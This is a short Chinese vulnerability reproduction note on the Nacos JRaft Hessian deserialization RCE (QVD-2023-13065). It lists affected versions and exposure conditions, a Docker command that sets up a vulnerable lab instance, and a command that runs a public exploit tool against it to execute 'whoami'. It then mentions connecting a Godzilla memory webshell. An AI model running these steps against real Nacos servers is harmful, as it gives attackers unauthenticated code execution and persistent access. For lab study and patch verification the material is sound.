跳到主要内容

Nacos 反序列化RCE(QVD-2023-13065)

漏洞介绍

在Nacos集群处理部分Jraft请求时,攻击者可以无限制使用 hessian进行反序列化利用最终实现代码执行

Nacos 1.4.1+在单机模式下默认不开放7848端口,故该情况通常不受此漏洞影响。然而,1.4.0、2.x版本无论单机或集群模式均默认开放7848端口。

影响范围

影响版本:

1.4.0 <= Nacos < 1.4.6  
2.0.0 <= Nacos < 2.2.3

利用条件

目标机器开放 8848、7848 端口即可,无需控制台权限。

复现步骤

利用工具:c0olw/NacosRce: Nacos JRaft Hessian 反序列化 RCE 加载字节码 注入内存马 不出网利用 (github.com)

Docker 搭建靶场:

docker run --name nacos -e MODE=standalone -p 8848:8848 -p 7848:7848 -d nacos/nacos-server:v2.2.2

工具执行:

java -jar NacosRce.jar http://127.0.0.1:8848/nacos 7848 "whoami"

252

根据说明连接哥斯拉:

|301

|325

|325

其他类型的内存马根据说明连接即可。